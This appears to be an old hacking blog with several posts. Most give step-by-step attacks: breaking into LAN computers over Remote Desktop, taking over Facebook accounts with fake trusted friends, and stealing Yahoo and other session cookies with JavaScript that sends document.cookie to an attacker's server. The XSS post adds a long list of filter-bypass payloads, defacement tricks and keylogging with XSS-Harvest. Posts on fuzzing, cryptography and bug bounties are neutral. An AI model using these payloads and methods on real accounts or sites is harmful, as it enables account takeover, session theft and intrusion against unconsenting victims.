Tuesday 31 December 2013

Hack Victim Computer

How To Hack & Access Same LAN Computers ?
If you are working in Office / Colleges and want to hack your friends & college mate PC then here is a trick.

First Step press win+ R

Go to Run> Type Cmd

now type command net view

It will be look as below


C:\>net view

Server Name            Remark
-----------------------------------------------
\\xyz
\\abc


Here you can get all the names of all the computers machine names which connect with your LAN.

Now you got the name.  Lets start hacking into the systems.

After you get server name now type tracert command for knowing IP of the victim machine.

Example: C:\> tracert xyz

Here you get the IP address of the XYZ computer machine.

Now go to windows start button and type Remote Desktop Connection
 

After click on Remote Desktop Connection you get below image..
 


Now type the IP address or computer name of victim machine.

Click on Connect <-|
It will also ask administrator password which is common as usual you known about.

After few second Victim machine shown in your Computer..
Now you can access that machine to open website, files, Software's, etc

Enjoy the trick..
Posted by at 1 comment:

Hack Instagram Account

Nir Goldshlager Founder of Break Security find the critical vulnerability in Instagram. Succesful hack allows attacker to access private photos and ability to delete victim's photos, edit comment and post new photos. 1. Hijack Instagram accounts using the Instagram OAuth (https://instagram.com/oauth/authorize/)

2. Hijack Instagram accounts using the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)


He reported a few issues to Instagram Include OAuth Attacks, But  the acquisition didn’t closed yet and Facebook Security was unable to put their hands on security issues in Instagram, So I was waiting, Waiting like a good WhiteCollar,  Then Facebook Security send me a message, They say even that they was unable to fix this issues because the acquisition didn’t closed yet, They will still payout for this vulnerabilities,

So, first,  checked Instagram’s OAuth protocol:  (http://instagram.com/developer/authentication/)

While researching Instagram’s security parameters, Nir noticed that Facebook Security had produced some impressive results in regard to their own Instagram OAuth vulnerabilities. They essentially blocked access to any and all files, folders, and subdomains by validate the redirect_uri parameter.

 


In addition, redirection was only allowed to go to the owner app domain.
Thus, hacker needed to locate some other way to get past their protection. Further complicating the issue was the fact that you can’t use a site redirection / XSS on the victim’s owner app. This is because you have no access to the files or folders on the owner app domain through the redirect_uri parameter.


Block Files Folders

For example:

Allow request:

https://apigee.com

Block requests:

Redirect_uri=https://www.breaksec.com

Redirect_uri=https://a.apigee.com/

Redirect_uri=https://apigee.com/x/x.php

Redirect_uri=https://apigee.com/%23,? or any special sign

As it stands, it appears that the redirect_uri is invulnerable to OAuth attacks.

While researching, I came upon a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth and then send the access_token code to their own domain.

For instance:

Let’s say Nir app client_id in Instagram is 33221863xxx and my domain is breaksec.com

In this case, the redirect_uri parameter should allow redirection only to my domain (breaksec.com), right? What happens when we change the suffix in the domain to something like:

Breaksec.com.mx

In this example, the attacker can send the access_token, code straight to breaksec.com.mx. For the attack to be successful, of course, the attacker will have to buy the new domain (in this case, breaksec.com.mx).

PoC Bypass (Fixed By Facebook Security Team):

https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token


Game Over.

Bug 2.

With this bug, Nir used the Instagram client_id value through the Facebook OAuth (https://www.facebook.com/dialog/oauth).

When you use the Instagram app, it can be integrated with Facebook.

For example:

When a user wants to upload their Instagram photos to Facebook, they allow this interaction and integration to take place.


Instagram Would like to access your public profile and friend list

Nir discovered that an attacker can use virtually any domain in the redirect_uri, next parameter. This was actually sort of baffling, and I don’t know why this happened, but it worked. You can literally use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.

This effectively allows the attacker to steal the access_token of any Instagram user,

With the access_token the attacker will be able to post on the victim behalf in his Facebook account, Access to his private friends list.

PoC (Facebook Already fixed this issue):

https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token



Source: Breaksec
Posted by at No comments:

Hack Facebook Account


Hence we know that there are many techniques for Hack Facebook Account like Phishing Attacks, Keylogging and other Social techniques but today we are going to see how to hack passwords using new feature introduced by Facebook the 3 Trusted Friends Password Recovery Feature in this what happens if you have lost your password and you don’t have any access to your default email address than this feature will handy by sending request to your 3 trusted friends and hence gaining your account password again.
For this technique you need to create 3 fake Facebook account and you need to surely add these as friends into your victims account whose account you are going to hack.

After success full addition of your fake accounts into victims account as friends follow the below steps .:

1. Go to Facebook and click Forgot your Password ?



2. Than you will get something like below just enter the details you know about him enter his Username, email address and full name.



3. After entering everything check it again and click on search.


4. After succeful search for the user Facebook will show some information about how many emails are linked to the account and there is simple option saying
No Longer Access to These click that one.


5. Now it will promote you to enter a new email address on which you will get the password resetting option so enter your email address I suggest you creating a Fake or Temporary email address for safety purpose.


6. Than it will promote you to enter the Security well if you have some security guess about that one than that’s ok but if you don’t know it than simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page like below.


7. Now just click continue and facebook will ask you to choose 3 trusted friends choose the 3 fake profiles of your which you created and added into the victims account.
8. After selecting 3 accounts facebook will send security codes to these accounts just enter these codes and you will get Password Resetting email from Facebook on the account you created in Step 5

That’s it now you are successful in Hacking Facebook Password with the 3 Trusted Friends Method.

Note: This trick only works if 3 trusted friends agree to give you the security code so its really important that you add your 3 fake accounts into your victims facebook account as a friend.
Posted by at No comments:

Fuzzing


Fuzzing is a software testing technique, often automated or semi-automated, that
involves providing invalid, unexpected, or random data to the inputs of a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. Fuzzing technique is commonly used to test for security problems in software or computer systems ans also used to discover coding errors and security loopholes in software, operating systems
or networks by inputting massive amounts of random data, called fuzz, to the system
 in an attempt to make it crash. If a vulnerability is found, a tool called a fuzz tester (or fuzzer), indicates potential causes.

There are two forms of fuzzing program; mutation-based and generation-based, which can be employed as white-, grey- or black-box testing. File formats and network protocols are the most common targets of testing, but any type of program input can
be fuzzed. Interesting inputs include environment variables, keyboard and mouse events, and sequences of API calls. Even items not normally considered "input" can be fuzzed, such as the contents of databases, shared memory, or the precise interleaving
of threads.

A fuzzer would try combinations of attacks on:

- numbers (signed/unsigned integers/float...)

- chars (urls, command-line inputs)

- metadata : user-input text (id3 tag)

- pure binary sequences

Fuzzing  best work for problems that can cause a program to crash, such as buffer overflow, cross-site scripting, denial of service attacks, format bugs and SQL injection. These schemes are often used by malicious hackers intent on wreaking the greatest possible amount of havoc in the least possible time. Fuzz testing is less effective for dealing with security threats that do not cause program crashes, such as spyware,
some viruses, worms, Trojans and keyloggers.

Fuzzing Tools:

UniOFuzz 0.1.2-beta - Universal Fuzzing ToolUniOFuzz version 0.1.2-beta - the universal fuzzing tool for browsers, web services, files, programs and network services/ports released by nullsecurity team.


Download

Basic Fuzzing Framework (BFF) based on Linux & Mac OSX Fuzzer Tool
By CERT
The CERT Basic Fuzzing Framework (BFF) is a software testing tool that finds defects in applications that run on the Linux and Mac OS X platforms. BFF performs mutational fuzzing on software that consumes file input. (Mutational fuzzing is the act of taking well-formed input data and corrupting it in various ways, looking for cases that cause crashes.) The BFF automatically collects test cases that cause software to crash in unique ways, as well as debugging information associated with the crashes. The goal of BFF is to minimize the effort required for software vendors and security researchers to efficiently discover and analyze security vulnerabilities found via fuzzing.

Download

 Source:
Wikipedia
TechTarget

Posted by at No comments:

Facebook AVOID FRIEND REQUEST BLOCK


   
  We usually send friend requests and if it's not accepted it is kept in pending.
If  there are lots of pending requests it may lead to block.
  
So this is a simple way to get those requests cancelled and protect your account from being blocked.

    Follow below steps :-

    1. Go to account settings.
    2. Select `download a copy` option.


    3. Choose `expanded archive` from the next page opened and enter your   password and click continue.
    4. Select `start my archive`.
    5. After a few hours you'll get the download link in your email.
    5. Download the file `facebook` and unzip it.
    6. Open the folder html and then `friend_requests.htm­l`.
    7. You can see the list of your friend requests and pending lists.
    Now goto their accounts and click`cancel request.

    That's all You are done now. Your account is safe.
Posted by at No comments:

How To Trace Your Facebook Profile Visitors

Now here we found who recently visited your profile.
Follow below steps for get to know your FB recent visitors.

 Step 1) Go to your Facebook Profile Page.
Step 2) Now Press Ctrl + U from your keyboard for see source code of your profile page.
Step 3) Now press Ctrl + F from your keyboard to open search box.
Step 4) Now search this code {"list":
Step 5) You find some Facebook Profile Ids are like shown below. Click on example image for zoom.

Step 6) There are some Facebook Profile Ids of your friends who visited recently.
Step 7) The first one ID's are showing visits the most number of time.
Step 8) Now if your want to findout, Open a new tab Enter below link : www.facebook.com/Facebook Profile Id
For Example : www.facebook.com/100001257992988
Enjoy The Trick.. :)
Posted by at No comments:

Email Hacking


Do U Think If Your Email Can Not Been Hackable, Then You Are Wrong...
Ur Email-ID Can Be Hack... But Its Can Be Hack Only Fault by User.. Most Of The Peoples Think That Their Has A Software to Hack A Email- ID's But Truth Is Their Is No Software Present For Hacking Ur Mail ID's..
                                                   
Email Hacking can be possible to many ways like:-
 
 1. Social Engineering

2.Phishing Attacks

3. Cookie Hijacking

4. By Keyloggers


Social Engineering:
This Process is defined as Hack the human mind without any tools...
This has become one of the hottest topics today and it seems to work out most of the times. Social Engineering doesn’t deal with the network security issues, vulnerabilities, exploits, etc. It just deals with simple Psychological tricks that help to get the information we want.
This really works!! But it requires a lot of patience.
We are all talking about network security and fixing the vulnerabilities in networks.
 But what happens if some internal person of a network accidentally gives out the passwords. After all we are all humans; we are also vulnerable and can be easily
 exploited and compromised than the computers.
Social Engineering attacks have become most common during the chat sessions.
With the increase in use of Instant Messengers, any anonymous person may have a
chat with another any where in the world. The most crucial part of this attack is to
win the trust of the victim.

Phishing Attack:
The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surroundering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information.

Cookie Hijacking:
In cookie hijacking we can hack email accounts very easily.. This trick is very
 dangereous because whenever user change a password then there is no need to
 attacker for again hack Email- ID of victim. And it would take you to inbox of victim's yahoo account without asking for any password of victim account.

Keyloggers:
Keylogger is a software program or hardware device that is used to monitor and log
each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because
these programs and hardware devices monitor the keys typed in a user can easily
find user passwords and other information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees
 use work computers for business purposes only. Unfortunately, keyloggers can also
 be embedded in spyware allowing your information to be transmitted to an unknown third party.
Cookie Hijacking:

U Can Hack Yahoo Account by Cookies Stealing or Hijacking From Browser.
Follow Steps and Learn it.
This is very Simple Tutorial and 100% Tested..!!..





Step 1: Download the Script on given link
http://www.multiupload.com/9Q3EPTOO47

Step:2 Download and extract files into your hard drive.
Step:3 Create a account in any ftp hosting site i suggested www.t35.com
Step4: Login to your account and upload 4 files into your ftp account.

Step5: Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'

javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

He would again redirected to his yahoo account.

Step6. Open the hacked.php . The password is 'hoc'.


You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password of victim account.
Posted by at No comments:

Cryptography

By definition cryptography is the process of converting recognizable data into an encrypted code for transmitting it over a network (either trusted or untrusted). Data is encrypted at the source, i.e. sender's end and decrypted at the destination, i.e. receiver's end.

In all cases, the initial unencrypted data is referred to as plain text. It is encrypted into cipher text, which will in turn (usually) be decrypted into usable plaintext using different encryption algorithms.


                                        Plaintext =>Ciphertext=> Plaintext=>Encryption=> Decryption

The Purpose :-
* Authentication : The process of proving one's identity.
* Privacy/confidentiality : Ensuring that no one can read the message except the intended receiver.
* Integrity : Assuring the receiver that the received message has not been altered in any way from the original.
* Non-repudiation : A mechanism to prove that the sender really sent this message.

In general cryptographic algorithms are classified into three categories as follows :

1) Secret Key Cryptography (SKC) : Uses a single key for both encryption and decryption.
2) Public Key Cryptography (PKC) : Uses one key for encryption and another for decryption.
3) Hash Functions : Uses a mathematical transformation to irreversibly "encrypt" information.

Secret Key Cryptography :-
With secret key cryptography, a single key is used for both encryption and decryption. Because a single key is used for both functions, secret key cryptography is also called symmetric encryption.

Secret key cryptography algorithms that are in use today include :

1) Data Encryption Standard (DES) : DES is a block-cipher employing a 56-bit key that operates on 64-bit blocks. DES uses a key of only 56 bits, and thus it is now susceptible to "brute force" attacks.
Triple-DES (3DES) and DESX are the two important variants that strengthen DES.

2) Advanced Encryption Standard (AES ) : The algorithm can use a variable block length and key length; the latest specification allowed any combination of keys lengths of 128, 192, or 256 bits and blocks of length 128, 192, or 256 bits.

3 ) International Data Encryption Algorithm (IDEA) : Secret-key cryptosystem written by Xuejia Lai and James Massey, in 1992 and patented by Ascom; a 64-bit SKC block cipher using a 128-bit key. Also available internationally.

4) Rivest Ciphers : Named for Ron Rivest, a series of SKC algorithms.

RC1 : Designed on paper but never implemented.
RC2 : A 64-bit block cipher using variable-sized keys designed to replace DES. It's code has not been made public although many companies have licensed RC2 for use in their products. Described in RFC 2268.
RC3 : Found to be breakable during development.
RC4 : A stream cipher using variable-sized keys; it is widely used in commercial cryptography products, although it can only be exported using keys that are 40 bits or less in length.
RC5 : A block-cipher supporting a variety of block sizes, key sizes, and number of encryption passes over the data. Described in RFC 2040.
RC6 : An improvement over RC5, RC6 was one of the AES Round 2 algorithms.

5) Blowfish : A symmetric 64-bit block cipher invented by Bruce Schneier; optimized for 32-bit processors with large data caches, it is significantly faster than DES on a Pentium/PowerPC-class machine. Key lengths can vary from 32 to 448 bits in length. Blowfish, available freely and intended as a substitute for DES or IDEA, is in use in over 80 products.

Public-Key Cryptography :-
Generic PKC employs two keys that are mathematically related although knowledge of one key does not allow someone to easily determine the other key. One key is used to encrypt the plaintext and the other key is used to decrypt the ciphertext. No matter which key is applied first, but both the keys are required for the process to work. Because a pair of keys are required, this approach is also called asymmetric cryptography.
In PKC, one of the keys is designated the public key and may be advertised as widely as the owner wants. The other key is designated the private key and is never revealed to another party.

Public-key cryptography algorithms that are in use today for key exchange or digital signatures include :

1) RSA : One of the most popular encryption algorithm, invented in 1977 by three MIT scientists (Ronald Rivest, Adi Shamir, and Leonard Adleman)
The key-pair is derived from a very large number, n, that is the product of two prime numbers chosen according to special rules; these primes may be 100 or more digits in length each, yielding an n with roughly twice as many digits as the prime factors. The public key information includes n and a derivative of one of the factors of n; an attacker cannot determine the prime factors of n (and, therefore, the private key) from this information alone and that is what makes the RSA algorithm so secure.

Hash Functions :-
Hash functions, also called message digests and one-way encryption, are algorithms that, in some sense, use no key. Instead, a fixed-length hash value is computed based upon the plaintext that makes it impossible for either the contents or length of the plaintext to be recovered. Hash algorithms are typically used to provide a digital fingerprint of a file's contents, often used to ensure that the file has not been altered by an intruder or virus. Hash functions are also commonly employed by many operating systems to encrypt passwords. Hash functions, then, provide a measure of the integrity of a file.
Hash algorithms that are in common use today include:
1) Message Digest (MD) algorithms : A series of byte-oriented algorithms that produce a 128-bit hash value from an arbitrary-length message.
MD2 : Designed for systems with limited memory, such as smart cards.
MD4 : Developed by Rivest, similar to MD2 but designed specifically for fast processing in software.
MD5 : Also developed by Rivest in 1991 after potential weaknesses were reported in MD4; this scheme is similar to MD4 but is slower because more manipulation is made to the original data.It accepts variable length message from the user and converts it into a fixed 128-bit message digest value.
One interesting and important aspect of the MD5 hash function is that it is a one way algorithm. This means you can produce the 128-bit fingerprint if the data chunk is available to you. You cannot, however, generate the entire data if only the fingerprint of the data is known.

2) Secure Hash Algorithm (SHA) : Algorithm for NIST's Secure Hash Standard (SHS). SHA-1 produces a 160-bit hash value and was originally published as FIPS 180-1 and RFC 3174. FIPS 180-2 describes five algorithms in the SHS: SHA-1 plus SHA-224, SHA-256, SHA-384, and SHA-512 which can produce hash values that are 224, 256, 384, or 512 bits in length, respectively. SHA-224, -256, -384, and -52 are also described in RFC 4634.

3) RIPEMD : A series of message digests that initially came from the RIPE (RACE Integrity Primitives Evaluation) project. RIPEMD-160 was designed by Hans Dobbertin, Antoon Bosselaers, and Bart Preneel, and optimized for 32-bit processors to replace the then-current 128-bit hash functions. Other versions include RIPEMD-256, RIPEMD-320, and RIPEMD-128.

4) HAVAL (HAsh of VAriable Length) : Designed by Y. Zheng, J. Pieprzyk and J. Seberry, a hash algorithm with many levels of security. HAVAL can create hash values that are 128, 160, 192, 224, or 256 bits in length.

5) Whirlpool : A relatively new hash function, designed by V. Rijmen and P.S.L.M. Barreto. Whirlpool operates on messages less than 2256 bits in length, and produces a message digest of 512 bits. The design of this hash function is very different than that of MD5 and SHA-1, making it immune to the same attacks as on those hashes.

6) Tiger : Designed by Ross Anderson and Eli Biham, Tiger is designed to be secure, run efficiently on 64-bit processors, and easily replace MD4, MD5, SHA and SHA-1 in other applications. Tiger/192 produces a 192-bit output and is compatible with 64-bit architectures; Tiger/128 and Tiger/160 produce the first 128 and 160 bits, respectively, to provide compatibility with the other hash functions.
Posted by at No comments:

Cross Site Scripting (XSS)


'XSS' also known as 'CSS' - Cross Site Scripting. It is a very common vulnerability
found in Web Applications, 'XSS' allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an "attacker" to inject some code into the applications affected in order to bypass access to the website or to apply  "phishing" on falls users.
This technique is also used for website Hacking.

Types of XSS:
There are actually three types of Cross-Site Scripting, commonly named as:

  1. DOM-Based XSS
  2. Non-persistent XSS
  3. Persistent XSS

DOM-Based : The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes "since born" some HTML pages created for differents aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.

The DOM-Based XSS exploits these problems on users local machines in this way:
 - The attacker creates a well builded malicious website
 - The ingenuous user opens that site
 - The user has a vulnerable page on his machine
 - The attacker's website sends commands to the vulnerable HTML page
 - The vulnerable local page execute that commands with the user's privileges
  on that machine.
 - The attacker easily gain control on the victim computer.

Non-Persistent : The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It's commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker's client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website
is vulnerable, the result page will return the result of these HTML entities.

Persistent : The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users informations and the difference is that in websites vulnerables to Persistent XSS the attacker doesn't need to
 provide the crafted url to the users, because the website itself permits to users to insert fixed data into the system: this is the case for example of "guestbooks". Usually the users uses
that kind of tool to leave messages to the owned
of the website and at a first look it doesn't seems something dangerous, but if an
attacker discover that the system is vulnerable can insert some malicious code in his
 message and let ALL visitors to be victim of that.

This works when the tool provided (the guestbook in the example) doesn't do any
check on the content of the inserted message: it just inserts the data provided from
the user into the result page.

How to Find XSS Vulnerabilities:-

To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.

Using 'Google Dorks' to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:"search.php?q=" now that is a common page and has alot
of results. Also note that most sites have XSS Vulnerabilities, its just having a good
eye, and some good knowledge on how to bypass there filteration.

Basics of XSS:
Well now lets start learning some Actual Methods, the most common used XSS
injection is :

<script>alert("Priyanshu")</script>

now this will alert a popup message, saying "Priyanshu" without quotes.

So,use "search.php?q=" and you can simple try the following on a website with the
 same thing,

http://website.com/search.php?q=<script>alert("Priyanshu")</script>

There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :

http://website.com/search.php?q=<br><br><b><u>Priyanshu</u></b>

if you see the bold text on the page and newlines then you knows its vulnerable.

Example:

How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface
methods, there are many ways for defacing i will mention some of the best and most used,
the first one being IMG SCR, now for those of you who dont know html, IMG SCR
is a tag, that displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>

ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything
that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

The other tags are not needed has the page will already have them. Ok it helps to
make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://www.hackersonlineclub.tk/" )</script>

There are many others ways that you can found using Google or other website.
Mine purpose is to make you understand the concept :)

How to Cookie Stealing using XSS ?
I decided to add this has its the most usefull method of XSS. First learn how to make
cookie logger from here:

How To Make A Cookie Stealer Php script ?

ok now you have it save it has a .php file and upload to your server, remember to
create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.
ok now your gonna want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
or
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth. Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

How to Bypass Filtration ?
Alot of sites may seem vulnerable but not executing the code, well to solve this read
this. Some common methods to bypass filtration is

')alert('xss');
or
");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.
You can also try hexing or base64 encoding your data before you submit, Please note
 its bad practice to use alert("XSS") to test for XSS, because some sites block the
keyword "XSS" before so we using "Priyanshu".

Some other ways to bypass filtration
website.com/search.php?q="><script>alert('Priyanshu')</script>
website.com/search.php?q="><script>alert("Priyanshu")</script>
website.com/search.php?q="><script>alert("Priyanshu");</script>
website.com/search.php?q="><script>alert(/Priyanshu");</script>
website.com/search.php?q=//"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz<script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"></script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=000"><script></script><script>alert(Priyanshu);</script>
website.com/search.php?q=000xyz</script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=--<script>"></script>alert(/Priyanshu/);</script>
website.com/search.php?q="><img src='javascript:alert('Priyanshu');'>
website.com/search.php?q="><script src='http://virus.js'</script>

Advanced XSS - way to bypass magic quotes filtration:
Ok now we are going to learn about some good techniqes. I have came across many
sites where 'Magic Quotes' is on and therfore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here

http://www.asciitable.com/
http://easycalculation.com/

This will help you write what you want, In my examples ill be writing "HOC" this is the following code

72 79 67

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(72, 79, 67)

Ok now "String.fromCharCode(72, 79, 67)" Is a JAVA (ASCII) way of saying "HOC".
And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(72, 79, 67))</script>

For More Script Coding Of XSS Visit
http://ha.ckers.org/xss.html

   XSS-Harvest:-

 Harvesting Cross Site Scripting, Clicks, Keystrokes and Cookies

Even today many of us still do not understand the impact of an exploited XSS vulnerability, and I include the security community in this statement. To summarise, a successfully exploited XSS vulnerability will allow the interception of ALL keystrokes, ALL mouse actions, ALL cookies (unless protected by scope) on ALL pages of the affect domain, regardless of whether or not the vulnerability is “reflected” or “persistent”.XSS-Harvest is multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool.

  Functionality of xss-harvest:

    * Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks)     to the vulnerable page and sets up communication with the XSS-Harvest server.
    * Any key entered will be sent covertly to the server.
    * Any mouse click performed will be analysed and the data covertly sent to the server.
    * Optionally ‘redress’ the vulnerable page to display a different page on the same subdomain – e.g. a login form.
    * If redressing the victim’s browser, allow subsequently loaded pages to be also ‘infected’ – assuming they don’t break the same-origin policy (i.e. they’re on the same subdomain).
    * Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).
    * Each victim has a separate history file containing all events, cookies and keystrokes.
    * Server console displays real time data received (due to multi-threaded nature, keystrokes are displayed as ‘.’ characters to avoid confusion).
    * Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS only in most cases), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.
    * Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.

How to Exploit XSS with XSS-Harvest?
Identify a page vulnerable to XSS (reflected or persistent will be fine – unless the victim is running IE9 or another plugin such as NoScript).

Understand the markup of the page. You should be looking to insert syntactically correct <script></script> tags in to the source of the vulnerable page. Most attackers will insert something like ‘<script>alert(1)</script>’ at this stage to ensure the page is actually vulnerable.

Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option.

Insert the following ‘injection string’ into the vulnerable page:
<script src=”>

This will return the client-side JavaScript to the victim, indicated by the ‘i’ in the URL.
Entice visitors to the infected page (or to follow a link in the case of reflected XSS).
Watch your victims roll in – a new history file will be created for each new victim.
To use of the redress function, start the server with the -r parameter:

./xss-harvest.pl -l -r http://vulnerablepage.local/login.html

Basic dependencies:
HTTP::Server::Simple::CGI, Digest::MD5, Time::Local, Getopt::Std, Net::Server::PreFork

Download XSS-Harvest


--> New:- Advance Scripts To Find XSS Vulnerabilities In  Websites.
Just Copy any script and try ..
For Example: www. xyz.com?q=" XSS Script"
  • "/>alert("Xss:Priyanshu")
  • "/></script><script>alert(/XSS : Priyanshu/)</script>

<body onload=alert(1)>
"<body onload="alert('XSS by Priyanshu')">

"><%2Fstyle<%2Fscript><script>confirm("XSS By Priyanshu")<%2Fscript>
  • http://test.com<script>alert(document.domain)</script>
  • http://test.com<script>alert(document.cookie)</script>

<img src=x onerror=alert(document.domain)>

x"></script><img src=x onerror=alert(1)>

q=" onclick="alert(/XSS/)

"><iframe src='javascript:prompt(/XSS/);'>

<iframe src="http://google.com"></iframe>

"><iframe src=a onload=alert('XSS')<

</script><script>alert(document.cookie)</script>
<xss>alert('xss')</xss>

<iframe src="http://google.com"></iframe>



DOM Based XSS Scripts
  • /default.aspx#"><img src=x onerror=prompt('XSS');>
  •  /default.aspx#"><img src=x onerror=prompt('0');>    

<img src=x onerror=prompt(1);> by ">


 "><img src=x onerror=prompt(1);>

"><script>alert('XSS')</script>

id=abc"><Script>alert(/xss/)</SCRIPT>


"><img src=" " onMouseover=prompt(/xss/);>

Default.aspx/" onmouseout="confirm(1)'x="


 Source:http://ha.ckers.org

 

Posted by at No comments:

Computer Forensic Tools And Tricks

                                                                                                                 
To Find The USB Logs

Go to Run Then Enter Code _|                        
For window 7 -->
C:\Windows\inf\setupapi.dev.log

For window Xp -->
C:\Windows\inf\setupapi.log
For Ram Analysis

Open Source Tools from ForensicZone

Download Link
Posted by at No comments:

Clickjacking

Clickjacking attack allows to perform an action on victim website, Mostly Facebook and Twitter accounts are targetable.
when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top
level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both. It may be similar to CSRF Cross Site Request Forgeries Attack. 

Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in
2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.

Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they
are typing in the password to their email or bank account, but are instead typing into
an invisible frame controlled by the attacker.

At present this attack mostly use on social network websites like Facebook and twitter, Because this attack is used by convinced victim for click on the link and SocialNetwork website might be very useful for attack on victim.

One famous example of clickjacking is Facebook.

Code:

 <style>
 iframe { /* iframe from facebook.com */
  width:300px;
  height:100px;
  position:absolute;
  top:0; left:0;
  filter:alpha(opacity=50); /* in real life opacity=0 */
  opacity:0.5;
}
</style>

<div>Click on the link to get more followers:</div>
   
<iframe src="/files/tutorial/window/clicktarget.html"></iframe>

<a href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>

<div>You'll be get 10000 followers..!!</div>

Output:
Click on the link to get more followers
Click Me
You'll be get 10000 followers..!!


Download
ClickJacking Tool

For Defence:
Clickjacking Protection


For more information:
OWASP
Posted by at No comments:

Hello friends Now U Can Chat With Command Prompt THrough So Here IS A Trick.....

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:



 
7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
 


8) Now all you need to do is type your message and press Enter.
Start Chatting.......!

DONE....ENJOY.~!!
Posted by at No comments:

Bug Bounty Web List

What is the Bug Bounty Program ?
Bug Bounty program provides recognition and compensation to security researchers practicing responsible disclosure. Company started Bug Bounty programs for improve their security, Cyber security researchers are finding vulnerabilities on top websites and get rewarded. 
Reward Program
(To submit you need to sign up to the free
Developer API program)



Product & Services (Hall Of Fame Only)

Product & Services (No Reward)
